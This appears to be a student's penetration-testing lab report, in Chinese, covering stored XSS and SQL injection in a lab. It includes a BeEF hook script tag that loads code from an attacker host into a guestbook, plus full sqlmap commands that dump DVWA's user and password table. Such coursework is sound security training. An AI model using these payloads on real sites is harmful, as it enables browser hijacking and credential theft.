网络渗透测试实验三——XSS和SQL注入

实验目的

了解什么是XSS；了解XSS攻击实施，理解防御XSS攻击的方法；了解SQL注入的基本原理；掌握PHP脚本访问MySQL数据库的基本方法；掌握程序设计中避免出现SQL注入漏洞的基本方法；掌握网站配置。

系统环境

Kali Linux 2、Windows Server

网络环境

交换网络结构

实验工具

Beef；AWVS(Acunetix Web Vulnarability Scanner)；SqlMAP；DVWA

实验步骤

XSS部分

利用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色：留言簿网站。存在XSS漏洞；（IIS或Apache、guestbook搭建）
攻击者：Kali（使用beEF生成恶意代码，并通过留言方式提交到留言簿网站）；
被攻击者：访问留言簿网站，浏览器被劫持。

1.利用AWVS扫描留言簿网站（安装见参考文档0.AWVS安装与使用.docx），发现其存在XSS漏洞，截图。

使用Windows Server 2003建立留言簿网站，如图。

用AWVS扫描后其存在的XSS漏洞如下图。

2 Kali使用beef生成恶意代码，截图。

使用如下代码

apt-get install beef-xss

安装beEF。
安装成功后进入etc/beef-xss打开config.yaml修改默认的账号密码（不能用默认账号密码，直接使用会报错）。

完成后保存退出。
输入以下代码

cd /usr/share/beef-xss

./beef

待其加载完成后生成的恶意代码如下。

3.访问 http://留言簿网站/message.asp ;将以下恶意代码写入网站留言板，截图。

<script src="http://Kali的IP地址:3000/hook.js"></script>

4.管理员登录login.htm，账号密码均为admin，审核用户留言。只要客户端访问这个服务器的留言板，客户端浏览器就会被劫持，指定被劫持网站为学校主页，将你在beef中的配置截图。

kali中打开如下网址，输入刚才修改的账号密码登录。

beef中配置截图如下（指定被劫持网站为Baidu）。

5.回答问题：实验中XSS攻击属于哪种类型？

属于存储型XSS攻击

SQL注入部分：DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机(IP为192.168.134.129）。

1.注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入1，返回
ID: 1
First name: admin
Surname: admin
返回正常；

再次输入1’，报错，返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1

此时可以断定有SQL注入漏洞。
http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#
下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低。

在浏览器中按F12找到Storage中的Cookie即可。

security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd

2.枚举当前使用的数据库名称和用户名。

你输入的命令：

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' -b  --current-db  --current-user

Sqlmap输出截图。

3.枚举数据库用户名和密码

你输入的命令：

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' --string="Surname" --users --password

Sqlmap输出截图。

4.枚举数据库

–dbs：枚举当前数据库
你输入的命令：

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' --string="Surname" -dbs

Sqlmap输出截图。

5.枚举数据库和指定数据库的数据表

-D 数据库名：指定数据库
–tables：枚举指定数据库的所有表
你输入的命令：

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' --string="Surname" -D dvwa --tables

Sqlmap输出截图。
（该题及以下题目的截图原图丢失，重新做了一遍，所以截图的IP和cookie的PHPSESSID会有不同）

6.获取指定数据库和表中所有列的信息

-D：指定的数据库
-T：指定数据库中的数据表
–columns：获取列的信息
你输入的命令：

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' --string="Surname" -D dvwa -T users --columns

Sqlmap输出截图。

7.枚举指定数据表中的所有用户名与密码,并down到本地。

-C：枚举数据表中的列
–dump：存储数据表项
你输入的命令：

sqlmap -u "http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=5a3416ecee2635f46be8e82bde93e9dd' --string="Surname" -D dvwa -T users -C user,password --dump

Sqlmap输出截图。

查看down到本地的用户名与密码，截图。（提示带.的文件夹为隐藏，在图形命令下，用文件浏览器打开文件夹，按下ctrl+h组合键可显示隐藏文件合文件夹，再按一次取消显示。）

实验小结

本次实验应用：

使用Windows Server搭建留言簿网站
发现XSS漏洞，BeEF劫持留言簿网站
SQL命令使用

对我来说，这次实验相比前面的难度确实要稍高些。长路漫漫，继续加油吧。